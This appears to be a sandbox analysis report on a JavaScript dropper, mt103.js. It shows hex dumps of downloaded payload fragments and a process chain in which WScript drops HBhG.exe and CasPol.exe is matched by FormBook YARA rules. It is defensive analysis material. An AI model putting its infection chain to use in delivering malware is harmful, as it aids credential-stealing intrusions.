                                                    2023-01-30 12:39:22 UTC461INData Raw: e5 d2 9b e9 0d 25 a7 cb c9 70 f6 b8 37 ed e5 32 c4 70 b4 6e 6f 4a e4 11 b2 43 78 60 00 1d 95 0e ed 3d 10 9e 5b b3 65 34 10 ed 1b ac d9 18 d6 c3 f6 91 25 fa f8 c6 de d4 a1 ac 21 6a 7e b3 19 87 b6 2f ae 98 98 34 42 c0 cd 9a ef 65 22 51 9f 55 14 fd a0 29 8b f1 fe 58 be a9 28 c7 b4 39 1f 7b 95 3a c3 37 33 fb 09 8f 4e 23 f3 ee 05 33 52 d3 3c 43 ed a9 3f 13 d9 3a 8a 52 65 64 bd 6f b2 14 fe 44 66 6a 8e 40 0a 79 e3 af ef 35 dc 40 af c8 4c bb 22 08 34 4f a6 0d 9f ec 70 cd 3b 34 6d d5 45 9a 39 f0 4d 18 23 65 69 a3 65 23 14 98 66 40 ef 4d a7 60 50 fb a4 d1 bc 9e a3 ca 80 7d d8 04 94 ea c3 6f bc c3 b5 21 1b f5 26 da 11 b7 20 d1 6b ed 03 16 44 48 a2 cf b6 6f 32 69 18 a5 4c 18 95 0c fe ac b3 20 08 b8 d7 c3 95 2e 47 62 67 a5 f6 37 08 df b7 97 5b c2 53 82 4d 93 32 14 22
                                                    Data Ascii: %p72pnoJCx`=[e4%!j~/4Be"QU)X(9{:73N#3R<C?:RedoDfj@y5@L"4Op;4mE9M#eie#f@M`P}o!& kDHo2iL .Gbg7[SM2"
                                                    2023-01-30 12:39:22 UTC469INData Raw: d1 7e f0 03 4d 65 0f 20 79 5e 2b f4 6f 23 63 7e 36 28 68 2e b3 63 05 d9 c8 8b 2d 3a d7 79 f9 2a 75 b7 aa d8 2f 46 12 f0 6a 91 6e 49 6c 3b 39 11 01 40 14 72 cb 45 6a 58 89 61 08 b4 33 79 29 18 86 93 bc e9 85 01 15 0a d2 c9 4f 36 02 f1 af e9 da 1e e6 91 7d 55 d7 33 e8 f5 a8 8c 3e 99 25 7d 34 a1 6e 79 42 14 c0 12 4d 0d 82 98 c3 68 c0 4b 94 83 7a db f9 29 94 9b f1 e1 a9 39 8c dc 20 30 54 c7 0b f6 49 82 9b d5 5b 67 42 70 44 d0 75 80 cc 78 11 31 0c 04 e0 30 86 c9 0a cd db 99 3e ca c0 5d b3 d5 6f e6 de 8f fa f4 a4 cc 80 70 26 fe db 19 4a a2 03 c8 4d 63 db c5 6d f8 ae f4 79 b2 7e 5b 82 ea 75 4b 78 63 84 59 7e b0 24 3a 63 00 03 47 03 41 04 06 f8 d1 a5 7e 7d 7d 4d c1 63 ed 01 81 d2 5b 7e cc f9 95 77 85 44 10 41 7a f0 c1 48 67 1f 8e 28 67 47 2a 2c 23 37 cc ed 4a 16
                                                    Data Ascii: ~Me y^+o#c~6(h.c-:y*u/FjnIl;9@rEjXa3y)O6}U3>%}4nyBMhKz)9 0TI[gBpDux10>]op&JMcmy~[uKxcY~$:cGA~}}Mc[~wDAzHg(gG*,#7J
                                                    2023-01-30 12:39:22 UTC477INData Raw: c3 86 9a 05 f8 52 b0 70 48 c4 df a5 de 97 3e 16 e5 11 13 bd 5a 0c a2 c8 39 ee 13 f3 2a 1c 3e b6 b6 ea 10 db 37 81 09 64 65 20 0c 3d 22 1a f4 d2 d2 79 07 0f d4 bf 71 aa f6 8c b7 12 af c3 f4 a2 4b d3 02 07 5a cd a9 97 e4 d9 6a 2c b2 b3 89 62 9f 14 e3 86 c8 75 56 d5 b8 3e f2 0a 27 4a f0 57 b0 58 33 3b d7 b5 da de fe 24 b8 d7 3d 5b e2 ef 85 70 63 16 be 1f 9a d5 02 5f bd f1 f3 26 11 9f 23 41 73 43 5f 5b 5f 8a 88 75 91 30 c3 45 91 a8 1f 38 0e a8 88 18 78 26 64 d1 98 90 31 29 9c 7d 36 a2 0a 87 be bb 83 c3 61 1e be 93 e6 0b b1 8e e0 69 d7 b6 18 34 eb 8c 19 b7 1e a0 f6 88 2a a2 ce 0f 3c ab 2e 44 ca 41 27 d2 b7 47 dc 93 30 39 5b 51 b2 4d ba a8 40 6a 12 df cc e7 ac af 1f f7 09 fa 4d 13 dc 3b 3f bb 0f 50 8c be 0d ab 43 a2 54 89 f5 cb 5c 4c ef e9 f9 9e e7 fe 34 2f d8
                                                    Data Ascii: RpH>Z9*>7de ="yqKZj,buV>'JWX3;$=[pc_&#AsC_[_u0E8x&d1)}6ai4*<.DA'G09[QM@jM;?PCT\L4/
                                                    2023-01-30 12:39:22 UTC484INData Raw: 4e 83 08 9a 5a 23 d5 76 6c 99 fe ff 58 8c db 7d 44 e6 c7 79 42 12 19 85 69 a5 49 96 c1 6f 3f a8 17 7b 9b 7f 13 04 ae 81 96 80 d6 e7 2f 9c f9 bb 15 11 52 e0 6b 92 8d 7d f6 d0 f7 89 cb fc f3 53 ac 06 01 4b 7e 7b 8d cd 0e 72 c5 0d 88 fd be 8e 0f 9a b4 21 39 d7 23 f7 e4 a8 de 88 fc c7 ec 33 ec 71 86 bd 11 39 cf a5 ec ad 1c 96 ee ba 36 eb ad ef 48 17 e4 0f 62 42 3d 32 9f 67 93 25 e4 d8 e1 06 52 a7 cc 2b f6 7e 45 fb d5 42 62 2d a7 ae 0f 48 56 45 85 36 8c 0d 1d 1a 8c 74 b3 00 27 21 03 40 98 5d 56 82 63 fb 50 f7 36 fa a2 92 44 b2 70 15 e2 f9 a6 7a 30 7f 26 f4 55 a2 d6 b0 48 73 8a a9 68 1f 00 e3 07 d3 c5 d3 73 0c c7 30 da ea d4 e6 5a 37 4f 35 ce e9 67 98 f1 ef cd ab f8 15 d4 9f 4d 33 c2 21 04 72 49 78 81 03 ad d8 5c b3 cf cd 8d 0c 21 74 a6 c7 9e c1 61 c0 f9 dc 3b
                                                    Data Ascii: NZ#vlX}DyBiIo?{/Rk}SK~{r!9#3q96HbB=2g%R+~EBb-HVE6t'!@]VcP6Dpz0&UHshs0Z7O5gM3!rIx\!ta;
                                                    2023-01-30 12:39:22 UTC492INData Raw: 38 30 b6 d5 e3 ff cd 4f f8 30 2c 6f ec 8c 47 17 5a b3 16 b0 b1 93 1c 24 d8 9b d1 e9 21 a8 87 fb 10 38 64 3e 80 84 5e 75 27 e5 17 b3 02 3e a1 78 4e 79 17 07 2f ac 79 60 84 53 71 e2 b1 87 75 0f 55 66 c2 d9 08 5f 7e dc d8 80 8d df f1 67 5f c0 51 97 69 e4 4b 4d 95 6b 3e cb 42 1c 8b e1 53 64 65 0e 4f 20 12 bb 5d f6 00 c6 ea 2e 6a 06 af 64 e9 9a e6 ef 65 e4 23 33 e7 dd 2c 6a e7 b0 49 5d 3a 54 31 08 0e cd c6 ef c5 6c 6b 98 0e 17 35 a0 27 92 e2 51 55 c6 ca fb 65 15 63 b3 3d 64 52 c7 74 86 f4 5e 9d 37 ff 13 3a da 48 b1 39 83 b0 e1 a0 ee cd df 71 a2 a7 bd fb 9e b3 03 06 07 35 62 27 f5 05 8e 85 81 92 9f aa 6e 1c d0 5d 5c 5c 4e c6 d6 b1 45 26 e8 b8 9f 64 88 4e 72 05 26 79 b5 95 b8 53 f4 f2 bd 2c 30 17 42 3a 05 c9 76 3b 0c 94 c4 0c ec 55 ae 59 b8 0e 3a 04 d2 18 88 12
                                                    Data Ascii: 80O0,oGZ$!8d>^u'>xNy/y`SquUf_~g_QiKMk>BSdeO ].jde#3,jI]:T1lk5'QUec=dRt^7:H9q5b'n]\\NE&dNr&yS,0B:v;UY:
                                                    2023-01-30 12:39:22 UTC500INData Raw: 90 36 41 61 d7 32 cd bb 1e 46 3c 38 0a 1f 03 61 03 0d b5 3e 26 9d 21 6b c4 29 13 ab 39 b8 77 88 ae d2 35 28 21 46 8b 65 50 2d 1c 30 5c bc 91 1b da 83 e0 10 df f6 b4 fc 2b b1 b4 bb 0c 96 3a bd a4 5c f6 a1 56 54 27 b2 ca 7c 13 01 d9 99 9c ce 3f 37 8e 8a d8 52 2c be 5f a4 3c 58 0c 64 99 2d 72 b6 1d 94 7d 1b 90 7b 9b c0 6d 45 7c 0a 7b 9d d8 01 ba c8 5f 20 78 19 22 96 7f a7 ec 2c 8f aa 61 f9 92 63 34 a7 d6 2c a7 6f 7c 84 4b 5e 9a 0d 44 a4 4d 8c aa e4 4f c6 42 92 e1 60 ee 05 a3 23 b2 c8 21 39 b6 af 9f b1 9e c8 0f 2c b3 7b ab 9a 0b 1e 07 a7 30 f8 03 69 67 4c 35 75 df f1 54 fe f6 aa c7 15 1d 07 a9 d4 f3 ec 8b 54 9f 45 3a dd dd 7e 6e 20 01 94 ff 0d 01 17 6d 11 03 41 99 86 73 5d 93 4c a3 d3 ca ca 51 d3 9e fd 80 b3 7b 56 a9 72 cb 2f 8d 54 3c 43 de 25 0b fe 5d 87 ec
                                                    Data Ascii: 6Aa2F<8a>&!k)9w5(!FeP-0\+:\VT'|?7R,_<Xd-r}{mE|{_ x",ac4,o|K^DMOB`#!9,{0igL5uTTE:~n mAs]LQ{Vr/T<C%]
                                                    2023-01-30 12:39:22 UTC508INData Raw: 29 e5 ac 2a cd 5f 64 15 62 00 c0 bf 64 12 ed 0f dd 20 0c 31 76 62 8a bd b2 2a 55 26 4a 1a f8 54 b2 d7 8b 48 6f ee 7e db f7 14 80 59 bf 91 52 fe fb 49 3a a6 95 e6 26 e4 bf c3 28 1f 44 4a bd 3f d6 d0 18 f3 60 22 16 9c 01 88 99 cb 50 c9 2f ce a9 db 29 7e 87 e8 4c 33 3e 32 3b f4 89 23 78 8b 0a f4 0d fd 7f f4 7d 52 5c 1a d2 fc 55 35 5d fa b4 45 7a 22 68 6e 1d c5 a3 80 bc d1 85 d7 cd 29 f6 52 99 5f 4e 7c 55 a2 d5 6b c4 5b 97 a3 1b b4 3a 1e 9c f1 87 0d f9 7d 86 51 1d 19 79 a8 c0 77 e2 75 06 43 2e b3 dd 3c b8 a6 cf 50 d8 a2 d3 bf 2f 4a 82 f2 8a b8 98 bb c9 1f 7c 98 99 af eb f0 b1 0f 74 a2 95 b9 07 32 11 4f bf d3 9e 25 0a 3a f7 32 28 ac cc 45 7e 46 ec 68 62 3d 65 cd 02 97 0d af b0 32 b5 48 f7 61 9b f6 ae 56 3a d2 83 8d 26 d6 3a ba 45 52 b8 5a 82 8a c0 d5 f2 c7 8e
                                                    Data Ascii: )*_dbd 1vb*U&JTHo~YRI:&(DJ?`"P/)~L3>2;#x}R\U5]Ez"hn)R_N|Uk[:}QywuC.<P/J|t2O%:2(E~Fhb=e2HaV:&:ERZ
                                                    2023-01-30 12:39:22 UTC516INData Raw: 1b 17 e0 01 03 37 16 b2 c2 41 9c d0 34 b3 45 b5 09 53 f6 47 3a 4c 68 37 29 37 4d f7 b4 a1 20 ce ee 99 fd bd 43 cf c0 f7 a8 dc 91 56 66 44 aa e3 1f fc 23 fd da db 1b d9 a3 e1 20 b3 3d 6b a0 ab 4f 05 36 0f 55 10 5c fc a1 95 e4 28 bf fd cd 41 16 cd d3 fa 2f 58 09 d9 3c 1d 03 b7 24 30 47 2d b6 4c 5e 35 cd df 20 15 85 51 4e 10 dc fe c4 a7 5a 3a a5 9a 41 09 53 ca 17 84 11 68 12 2c 0d d4 e7 9e 06 45 ea 41 c0 9f 26 64 ea 90 0a 06 3b d6 3e 03 54 25 61 a3 29 71 5f d2 04 6e 86 0d 83 62 ad 02 ca 1c 47 b9 4b 95 da c7 e8 a7 74 45 14 c5 61 d1 81 67 2e fb d7 6f 2d 80 b2 74 d6 b9 53 77 a5 ef cb 89 43 f4 c7 02 53 33 c3 88 bb d4 ad eb c7 5d c1 40 87 b4 7f 43 55 95 5f 47 c2 40 05 87 1b 70 17 bb 02 3a 0d a2 3f 94 80 95 1c 75 23 d9 27 33 75 cc 5a 20 9e a5 8a b8 43 9d 2e 62 29
                                                    Data Ascii: 7A4ESG:Lh7)7M CVfD# =kO6U\(A/X<$0G-L^5 QNZ:ASh,EA&d;>T%a)q_nbGKtEag.o-tSwCS3]@CU_G@p:?u#'3uZ C.b)
                                                    2023-01-30 12:39:22 UTC523INData Raw: ec bd 54 a9 04 dd 43 45 eb 4d e7 f0 ef 32 c9 04 27 6d 67 00 ac d4 46 a0 a5 62 bd 5a 28 b3 63 21 54 a1 72 45 b6 93 21 90 54 1f 5b 83 a7 bf 80 c1 7a 84 8a f2 26 8c 7b 52 7b 36 86 27 9a 1a 64 83 85 8a 28 10 4f 62 11 de 78 a5 c3 eb b6 53 98 85 dc 6f 36 1c 9c 88 17 30 31 0f 13 e3 ef 6c b3 19 e2 fa 0d de a0 9a 19 a2 7a ef 49 05 95 b7 96 9a 34 25 3f 78 a4 47 e8 f9 d8 67 05 a8 70 ee 4e 13 3a 0d dd 92 be 83 8d 3e b8 15 e3 4a 83 b5 33 ca ec b5 44 df 61 f0 9f df 47 9b e7 d0 69 4e 7a 40 2a 7a 55 bf de 60 9e f8 d5 63 68 54 38 39 b8 af d2 99 68 a7 6a 0b f9 ad e0 e2 24 02 d9 1f b8 fe c1 62 3e 6e 7a e5 32 b4 9e 48 bb bf 29 48 60 9f 6c 0a 25 30 cf cc 18 3c 4f 25 e9 e2 22 de 88 fd c9 01 f9 6d 74 4a 5b 6a 89 11 e6 ed 3f f6 02 b3 fd e1 4e f7 da 74 ac c6 54 14 d4 19 d7 48 fb
                                                    Data Ascii: TCEM2'mgFbZ(c!TrE!T[z&{R{6'd(ObxSo601lzI4%?xGgpN:>J3DaGiNz@*zU`chT89hj$b>nz2H)H`l%0<O%"mtJ[j?NtTH
                                                    2023-01-30 12:39:22 UTC531INData Raw: 78 54 2a 2f 80 d7 d3 6a 6b 1f db f0 ff f0 34 6b 6c 88 3e 11 1c a2 14 b6 fd 65 8d 12 a6 89 94 a4 b5 57 36 3c 59 07 77 16 c3 e2 02 19 20 01 36 01 2a 04 5f a3 33 e1 fb 15 23 93 54 46 b5 dd b7 77 01 9a 65 bc eb 7e 04 70 48 21 ae 9a 9d 58 93 c8 b5 ad 2d 76 05 53 2a 22 6f 13 83 43 dd 19 01 67 39 50 e8 b7 70 48 21 3b 51 30 ae 92 b7 cf 5c b8 a4 92 1e 09 05 0e 8a 95 0e 62 7c cd d8 7d b3 17 11 65 e3 f3 0f 1e 70 59 fd 85 9f e0 a3 d3 7f 5c 18 0d 5a eb e4 e1 b9 35 25 a8 c9 42 77 87 01 4b 05 1c 41 cf 31 5d 5d 0d e2 c8 3d 21 b5 16 64 e4 2e 47 34 ae 66 d7 b5 53 af 7e 01 09 29 b3 73 bd 85 96 b9 e3 fe f7 ed 1a 48 a1 ef 37 cc a0 44 85 1c 7c b5 84 91 0a 03 89 52 01 53 a2 63 1b 18 f7 08 84 44 6e 5c 44 ba 42 dd 07 db fd 1f d6 f4 b6 64 58 1e df fb 51 c6 e8 f9 98 06 98 33 4c f1
                                                    Data Ascii: xT*/jk4kl>eW6<Yw 6*_3#TFwe~pH!X-vS*"oCg9PpH!;Q0\b|}epY\Z5%BwKA1]]=!d.G4fS~)sH7D|RScDn\DBdXQ3L
                                                    2023-01-30 12:39:22 UTC539INData Raw: c7 86 61 7a 56 8a eb 88 be 76 c2 72 ee 60 03 5d 1c 4a 88 bc 96 fa c6 fc ab 4f b8 79 9c 45 95 26 a8 66 4c fb 8f 62 c9 c5 25 44 27 6b fa 87 c0 9d c5 9f d1 11 b8 82 c2 86 c1 7d e6 d2 40 87 6c ec 11 09 ae 82 bc a6 2a ca ab de 29 a0 e0 f1 b1 8a ad 57 25 73 26 bf a4 00 fb f5 d0 b2 24 cf 27 76 db 1a a6 30 ba 77 20 5c 03 21 fd d7 22 9d 29 8c a2 fc 0b a1 93 f1 c4 dc 6f c8 1b 25 44 1b 4e ce 08 fb 25 eb 53 2f 25 5d c4 64 f8 34 50 af 8d 57 6b eb 52 6f 2b e2 0e a7 00 08 2d 6a 05 9d c7 07 28 4e 53 9c 4f 5b 3e ee cd c0 de e6 0d 5e 5d b8 68 49 88 34 9c f5 3b ed 34 0d 9e 14 3d fc ec 64 9d a0 a4 92 5a 39 41 20 66 f7 cc 84 44 fd 36 a4 cb d5 2d 68 f6 5f 79 25 0f eb 8b b9 be d8 4c a1 fb 0e 26 05 3f d6 76 6a 3c d9 27 bd da 02 be 13 29 f4 c2 0d 6a 59 63 eb bf e3 b3 fe bf 01 20
                                                    Data Ascii: azVvr`]JOyE&fLb%D'k}@l*)W%s&$'v0w \!")o%DN%S/%]d4PWkRo+-j(NSO[>^]hI4;4=dZ9A fD6-h_y%L&?vj<')jYc
                                                    2023-01-30 12:39:22 UTC547INData Raw: eb cc 4c f3 ac 3e 8d b6 4f bd f5 b6 b6 a9 7a f6 0f 36 c8 2a b8 ca 22 4f d0 2e 79 30 b2 40 87 af 7f 7c b3 10 de a9 bc 88 9f a3 92 3b 65 0d ca 34 60 3f 62 c5 1b 91 94 76 10 43 00 ea b9 e6 1b 0f f5 24 09 cb cb 1f 5d 96 b4 25 6d a8 30 e6 33 a5 3b 45 c1 0b f8 80 dc 1e cf 06 c8 72 64 a9 0b 88 5e 39 ea a0 ad 85 5e 2b da 57 7c cf 24 cc b7 dc 62 ed 3c 34 fc 7d 14 df d6 bf 50 cf cf d8 4b 33 5f 8a 01 c6 7d 0d 26 11 2c 54 a5 fd 17 d3 de b3 fa 30 1f 2f c4 de c7 fb e1 20 6c 1c 49 de 56 40 4b 5d fb 5f 4b 4e 03 83 7d c7 a0 29 75 b0 87 e7 65 91 eb 3e 44 d0 b5 5b 39 41 2a 30 55 67 ec 5c 3a 12 70 c1 9c 97 73 72 e1 77 6a 82 8d ba 48 ce 7c f2 b8 ce 7f 06 3a f6 72 df 23 c4 c1 05 ef 18 db 66 1f a6 c9 53 9b af 8a db 6c b0 cd 32 b1 51 79 f0 20 1f ce 76 bd 54 84 5a e8 38 0d ed c4
                                                    Data Ascii: L>Oz6*"O.y0@|;e4`?bvC$]%m03;Erd^9^+W|$b<4}PK3_}&,T0/ lIV@K]_KN})ue>D[9A*0Ug\:psrwjH|:r#fSl2Qy vTZ8
                                                    2023-01-30 12:39:22 UTC555INData Raw: cc 5c c3 4d e8 24 a8 53 a7 e6 5d 59 56 81 b3 ea bd 20 be ae 46 46 e4 02 d1 5a 17 ff 28 e9 04 35 38 53 c3 99 ad 4b d9 a2 12 4a db 7d c8 a9 30 85 b4 07 1a 34 e5 e1 99 1d f5 94 76 32 62 d1 3a 2f 60 9b 37 0d e7 8d 95 01 0d b9 ed 91 c3 28 12 6a e4 dd 6d ea 94 72 44 78 d7 80 e5 9f f3 3c ee d5 0e 3d 65 a8 aa 26 1c e8 54 b5 53 ad 26 b5 91 f9 2b 86 61 6f 36 84 db 32 fd 85 61 7b ef 2d 50 d6 2f 24 8d 00 92 6a 5a 13 65 e3 33 9f 28 5e ac 5c 37 93 cb 08 ae 65 9c 13 d2 7a 0b 1b 23 46 f4 7a a9 27 3d ce b5 29 f5 75 9d a0 e7 9e 7d 63 f7 2f 45 21 3e 2c eb e2 3f 4c ed ff b2 15 33 68 f8 0e 56 29 15 e3 1b 0b f5 b8 f6 a5 16 e5 e3 d3 aa 63 f7 f7 11 b7 90 af 72 02 e6 af 4f 44 06 8d 7c 23 15 b7 2d d9 88 50 18 3c 3c 83 ea 88 1b 5e 37 6a 56 67 d1 1b 6f 5d d7 93 e8 b5 24 b7 25 6a f6
                                                    Data Ascii: \M$S]YV FFZ(58SKJ}04v2b:/`7(jmrDx<=e&TS&+ao62a{-P/$jZe3(^\7ez#Fz'=)u}c/E!>,?L3hV)crOD|#-P<<^7jVgo]$%j
                                                    2023-01-30 12:39:22 UTC563INData Raw: 6e a0 18 de 96 e1 2a 36 0c 90 ea 91 3c d2 8f df 09 46 90 c4 4f cc 05 b3 49 b1 14 b6 fb 0b 7b 5a 05 1d 34 6d 37 77 a8 be 12 fe e8 c1 07 bf 1e 45 ac 67 87 2f 11 91 15 a8 dc 1e 93 90 5e 2a 3e 0e 01 4b 4c 04 c5 84 53 12 67 bc 41 3d 1b 92 d4 41 81 ce 9e 23 4d ee a8 f8 e3 7b a6 65 b6 a6 8f ef 32 f3 44 c1 26 bc c8 99 37 7c ca c6 c4 25 8b 79 28 4f 1e 1e 98 f1 c5 ac 9c d9 ab e0 4f 25 a3 3f fe 22 b2 1b 10 18 d0 2c 3f 91 bd 38 a8 e0 58 66 8a b1 d7 35 40 43 5d 40 e1 1e e4 a8 b8 13 9d aa c6 88 fc 33 71 6f 6a 0d 5d c0 3e a6 71 b7 da 6e d2 44 13 76 54 da 76 32 27 3c 65 75 31 0a cc 22 7c e4 a7 35 cd f9 b2 de 1e 57 9b 1a a3 1f 56 22 a7 25 13 09 8a fb 25 d9 f2 e9 11 af 0d 75 8f be 40 28 d0 d7 0a 9d 8c c3 c8 49 c0 a0 53 c6 b1 95 67 c3 9c 33 b6 1c 00 bb 02 c6 b0 b7 0b 9d ac
                                                    Data Ascii: n*6<FOI{Z4m7wEg/^*>KLSgA=A#M{e2D&7|%y(OO%?",?8Xf5@C]@3qoj]>qnDvTv2'<eu1"|5WV"%%u@(ISg3
                                                    2023-01-30 12:39:22 UTC570INData Raw: b4 71 27 0c 24 16 d8 7e 5d ba a9 40 66 1e 34 2f 87 fd 7e 3b 0b c4 dd 9a 7d a8 88 9b 7b 91 e1 86 17 6b 62 a7 2c a1 71 34 bd a0 3b 5f 42 f2 9e 2c 07 5b 40 d1 6b 65 2c b4 59 11 bf ff a9 2d 39 25 90 29 9f a7 09 69 ec b8 11 2f a7 a3 82 f8 f8 3a 99 9c da 73 dd 20 a0 55 ad 1f 12 9f 80 ce ae 9b b5 d9 1a 74 d8 d3 ef cd 72 d5 fd ef 60 7f 79 88 2d a2 7f 74 09 7b e4 49 41 8f 72 2a d9 80 08 6b 2c cc c6 d5 32 d8 2e 3d 94 c3 7c c6 6b 5b d3 68 4e af c5 bd 60 09 7f 2a 5f 94 88 98 4c 0c 56 41 5c 02 6f 8e 49 67 b3 de ef 67 9b 87 ee a5 ca fe 87 27 d8 68 0b b2 1a d9 ab 9b c8 1f 2b 34 52 df 22 56 8d b0 3a 25 3f e6 7e c1 e1 73 b5 a9 0f 50 40 9f f8 5e 93 ae e0 aa 83 cd f9 72 51 dd 93 55 7b f3 8c 6a 68 a2 db a6 79 40 de 3f 87 17 4c 10 3f b5 67 c6 d6 05 9d c6 4b b3 40 f7 af ee 61
                                                    Data Ascii: q'$~]@f4/~;}{kb,q4;_B,[@ke,Y-9%)i/:s Utr`y-t{IAr*k,2.=|k[hN`*_LVA\oIgg'h+4R"V:%?~sP@^rQU{jhy@?L?gK@a
                                                    2023-01-30 12:39:22 UTC578INData Raw: 90 df d4 d6 7b 26 51 52 d4 c6 41 3d 08 8b c2 30 5d 96 2d 91 13 3d dc 8c 4f 60 f0 2a af 61 6d 4e 43 a4 bc ed 62 e7 0a fa 1f 87 c9 03 39 ce 1a ee 61 7e df 8d 11 c4 d4 9a c1 ae d1 49 8f 08 bb 58 41 cb a7 8a 78 b1 63 89 0b 04 57 59 0c c7 69 88 64 37 bd 6c de 4f 0c b5 1a 7e 63 f3 3c 34 da ef 30 88 93 e2 02 8b 37 4b 5a a6 f9 f4 6c 57 bb cc 9f 91 03 b1 3b f0 99 48 c7 31 05 4d 32 58 dd d6 c2 b4 13 90 7b b9 59 d5 83 38 e1 fa 0f 1e 2b 0d 8d 82 cc 06 35 53 e3 36 16 ea 25 59 2d d6 aa 54 61 75 f8 4e 2d 65 37 0c 7c 1e 65 8c e9 0d ca 0a 48 8d aa ff 8d 87 8a c3 06 16 3b db 35 b7 fb ea 0b 35 c0 d0 b7 d2 2c 68 7e 94 87 a0 28 9b 17 f7 98 2a 79 69 4d 3f 11 fb 60 c9 48 0e 9a 4f a7 94 ec ae 55 3f de 77 06 65 c1 b4 0a 63 5a 68 12 5c 45 0b d4 9e 25 fd f6 f7 30 09 01 24 c3 0f 22
                                                    Data Ascii: {&QRA=0]-=O`*amNCb9a~IXAxcWYid7lO~c<407KZlW;H1M2X{Y8+5S6%Y-TauN-e7|eH;55,h~(*yiM?`HOU?wecZh\E%0$"
                                                    2023-01-30 12:39:22 UTC586INData Raw: cc 43 eb 99 85 ac 82 cd b6 1a e3 5e 06 ee a9 59 15 73 41 ea 91 08 07 b4 8e e7 e9 8f 9e f1 18 00 bc 2a 4a 0a 6c 4b 41 18 d8 07 0c 1a 12 31 5d d6 46 37 b9 26 71 f4 c9 d3 c0 a2 72 7c 04 d5 15 4c 5f 33 4d 38 f9 1a 49 d5 df f0 a4 f4 dc ab 00 d2 d8 5a e7 5f c7 4b 93 f5 ed 03 c4 f4 cd 64 bf e2 cb ba 92 9a c1 05 8e 06 ec 84 d7 b6 8f 8c ba f8 f5 ee 3a a2 2c 16 8d f3 9b 58 c9 d9 de 85 4e 23 ef 86 6b 77 37 2f 67 8f af 9c f0 ed 28 e9 98 80 e4 e7 6c 51 9b b9 c0 b5 10 a0 22 ad 38 3a a4 0c d4 43 2f f9 36 16 22 49 51 26 de da fe 2f 90 4e a3 5d cb 0c 7d 45 16 d3 dd ed 49 6e d9 1a 63 6c 48 11 ad 1d ac 8a 34 00 3c 89 c4 f4 9a af 22 16 e8 28 b4 de 2d 71 86 ef ed da 23 ca 38 6f 0b 99 7a ed 60 57 e5 5d 04 0d 7b d6 b5 d9 8b 8b 30 e6 c0 8c 3e b0 c7 63 1e ba bb 98 74 18 02 a9 dd
                                                    Data Ascii: C^YsA*JlKA1]F7&qr|L_3M8IZ_Kd:,XN#kw7/g(lQ"8:C/6"IQ&/N]}EInclH4<"(-q#8oz`W]{0>ct
                                                    2023-01-30 12:39:22 UTC594INData Raw: 66 01 00 00 3d 04 00 00 20 24 00 74 00 68 00 69 00 73 00 2e 00 53 00 6e 00 61 00 70 00 54 00 6f 00 47 00 72 00 69 00 64 00 00 00 00 00 26 24 00 74 00 68 00 69 00 73 00 2e 00 54 00 72 00 61 00 79 00 4c 00 61 00 72 00 67 00 65 00 49 00 63 00 6f 00 6e 00 02 00 00 00 14 24 00 74 00 68 00 69 00 73 00 2e 00 49 00 63 00 6f 00 6e 00 04 00 00 00 18 24 00 74 00 68 00 69 00 73 00 2e 00 4c 00 6f 00 63 00 6b 00 65 00 64 00 c3 09 00 00 1c 24 00 74 00 68 00 69 00 73 00 2e 00 44 00 72 00 61 00 77 00 47 00 72 00 69 00 64 00 c5 09 00 00 2c 70 00 72 00 6f 00 67 00 72 00 65 00 73 00 73 00 42 00 61 00 72 00 31 00 2e 00 4d 00 6f 00 64 00 69 00 66 00 69 00 65 00 72 00 73 00 c7 09 00 00 22 24 00 74 00 68 00 69 00 73 00 2e 00 4c 00 6f 00 63 00 61 00 6c 00 69 00 7a 00 61 00 62 00
                                                    Data Ascii: f= $this.SnapToGrid&$this.TrayLargeIcon$this.Icon$this.Locked$this.DrawGrid,progressBar1.Modifiers"$this.Localizab
                                                    2023-01-30 12:39:22 UTC602INData Raw: 00 00 00 00
                                                    Data Ascii:


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:13:38:37
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js"
                                                    Imagebase:0x7ff7973b0000
                                                    File size:163840 bytes
                                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:8
                                                    Start time:13:39:23
                                                    Start date:30/01/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\HBhG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\HBhG.exe"
                                                    Imagebase:0x8a0000
                                                    File size:615936 bytes
                                                    MD5 hash:02DF8C86345D056735FA60116B93ED2B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 55%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Target ID:9
                                                    Start time:13:39:24
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                    Imagebase:0xcc0000
                                                    File size:107624 bytes
                                                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
